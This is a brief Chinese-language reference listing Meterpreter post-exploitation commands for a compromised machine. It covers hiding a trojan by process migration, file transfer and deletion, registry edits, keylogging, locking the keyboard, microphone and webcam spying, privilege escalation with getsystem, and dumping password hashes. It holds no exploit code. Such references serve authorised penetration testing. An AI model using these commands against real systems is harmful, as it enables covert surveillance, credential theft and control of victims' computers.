获得一个session会话后，可进行的命令操作

session操作

Msf下 sessions –l 列出目前msf后台已有的session
Sessions –i 1 使用id=1的seesion，并进入meterpeter
Meterpreter下 background查看当前后台存在的session

以下命令皆在 meterpreter下执行

进程相关功能:
Ps查看进程
比如木马进程1234 靶机桌面进程exploit.exe是3445
Ps 3445 就可以把木马进程注入到桌面进程，可对木马进程做隐藏
migrate 7240 meterpreter shell的pid调到7240里相对稳定应用的进程里
Run vnc 查看靶机的桌面，不过不能点击

文件管理功能：
upload 上传文件
download 下载文件
mkdir 创建文件
edit 编辑文件
mv 移动文件
cat 查看文件内容

rm -f 删除文件
rm -rf 删除文件夹
-r 就是向下递归，不管有多少级目录，一并删除
-f 就是直接强行删除，不作任何提示的意思

网络及系统操作:
arp 查看arp缓存表(IP地址和MAC地址的对照关系)
ifconfig/ipconfig 查看ip地址网卡
netstat 查看端口连接

kill 结束进程 kill 432
ps 查看进程
reg 修改注册表
reboot 重启电脑
shell 获取shell
shutdown 关闭电脑
sysinfo 获取电脑信息

用户操作和其他功能 Enumdesktops 窗体列表（用户登录数） keyscan_dump 键盘记录-下载 keyscan_start 键盘记录-开始 keyscan_stop 键盘记录-停止 uictl 获取键盘鼠标的控制权uictl disable keyboard锁定键盘 record_mic 录制音频 webcam_chat 查看目标的摄像头 webcam_list 摄像头列表 webcam_stream 摄像头监控 getsystem 获取高权限 hashdump 下载hash密文